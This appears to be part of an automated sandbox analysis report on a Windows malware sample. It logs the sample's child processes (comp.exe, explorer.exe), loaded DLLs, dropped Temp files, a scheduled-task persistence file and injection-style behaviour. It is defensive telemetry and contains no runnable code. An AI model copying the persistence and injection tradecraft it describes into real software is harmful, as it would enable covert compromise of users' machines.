          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: <html><head><META http-equiv=Content-Type content="text/html; charset=utf-8"></head><body><!--StartFragment-->
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: n<html><head><META http-equiv=Content-Type content="text/html; charset=utf-8"></head><body><!--StartFragment-->
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: -help
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: SYNTAX: -add filename (switches)
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeFile read: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe "C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe"
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeProcess created: C:\Windows\SysWOW64\comp.exe C:\Windows\SysWOW64\comp.exe
          Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeProcess created: C:\Windows\SysWOW64\comp.exe C:\Windows\SysWOW64\comp.exe
          Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeProcess created: C:\Windows\SysWOW64\comp.exe C:\Windows\SysWOW64\comp.exe
          Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeProcess created: C:\Windows\SysWOW64\comp.exe C:\Windows\SysWOW64\comp.exeJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeProcess created: C:\Windows\SysWOW64\comp.exe C:\Windows\SysWOW64\comp.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeProcess created: C:\Windows\SysWOW64\comp.exe C:\Windows\SysWOW64\comp.exeJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: olepro32.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: svrapi.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: shunimpl.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: mscms.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: coloradapterclient.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: thumbcache.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: pla.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: pdh.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: tdh.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: mstask.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: olepro32.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: svrapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: shunimpl.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: mscms.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: coloradapterclient.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: thumbcache.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: pla.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: pdh.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: tdh.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: olepro32.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: svrapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: shunimpl.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: mscms.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: coloradapterclient.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: thumbcache.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: pla.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: pdh.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: tdh.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: mstask.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeSection loaded: mstask.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeStatic file information: File size 13599640 > 1048576
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x50de00
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1f3e00
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeStatic PE information: More than 200 imports for user32.dll
          Source: Binary string: iassvcs.pdb source: comp.exe, 00000002.00000002.1650280495.0000000005970000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719784982.0000000005820000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787365000.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000000D.00000002.1719883725.0000000000982000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788041968.0000000000242000.00000008.00000001.01000000.00000000.sdmp, cckrnaa.10.dr, pbxllkvlhugf.8.dr, djivmxg.2.dr
          Source: Binary string: wntdll.pdbUGP source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1384464950.00000000065F5000.00000004.00000020.00020000.00000000.sdmp, BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1389532302.00000000073B0000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649593954.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649842763.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719035494.0000000004A8C000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719531853.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1786914939.00000000040CD000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787138417.0000000004570000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602423452.0000000005040000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602042227.0000000004BAF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720201223.0000000004EB2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720318364.0000000005210000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788501431.0000000005400000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788275557.0000000004F65000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1384464950.00000000065F5000.00000004.00000020.00020000.00000000.sdmp, BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1389532302.00000000073B0000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649593954.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649842763.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719035494.0000000004A8C000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719531853.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1786914939.00000000040CD000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787138417.0000000004570000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602423452.0000000005040000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602042227.0000000004BAF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720201223.0000000004EB2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720318364.0000000005210000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788501431.0000000005400000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788275557.0000000004F65000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: iassvcs.pdbGCTL source: comp.exe, 00000002.00000002.1650280495.0000000005970000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719784982.0000000005820000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787365000.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000000D.00000002.1719883725.0000000000982000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788041968.0000000000242000.00000008.00000001.01000000.00000000.sdmp, cckrnaa.10.dr, pbxllkvlhugf.8.dr, djivmxg.2.dr
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeStatic PE information: section name: .didata
          Source: djivmxg.2.drStatic PE information: section name: hla
          Source: pbxllkvlhugf.8.drStatic PE information: section name: hla
          Source: cckrnaa.10.drStatic PE information: section name: hla
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F09FB1 push ecx; ret 12_2_02F09FC4
          Source: C:\Windows\SysWOW64\comp.exeFile created: C:\Users\user\AppData\Local\Temp\cckrnaaJump to dropped file
          Source: C:\Windows\SysWOW64\comp.exeFile created: C:\Users\user\AppData\Local\Temp\djivmxgJump to dropped file
          Source: C:\Windows\SysWOW64\comp.exeFile created: C:\Users\user\AppData\Local\Temp\pbxllkvlhugfJump to dropped file
          Source: C:\Windows\SysWOW64\comp.exeFile created: C:\Users\user\AppData\Local\Temp\djivmxgJump to dropped file
          Source: C:\Windows\SysWOW64\comp.exeFile created: C:\Users\user\AppData\Local\Temp\pbxllkvlhugfJump to dropped file
          Source: C:\Windows\SysWOW64\comp.exeFile created: C:\Users\user\AppData\Local\Temp\cckrnaaJump to dropped file
          Source: C:\Windows\SysWOW64\comp.exeFile created: C:\Windows\Tasks\ServiceHub Controller.jobJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\SysWOW64\comp.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\DJIVMXG
          Source: C:\Windows\SysWOW64\comp.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PBXLLKVLHUGF
          Source: C:\Windows\SysWOW64\comp.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\CCKRNAA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F090DD GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_02F090DD
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
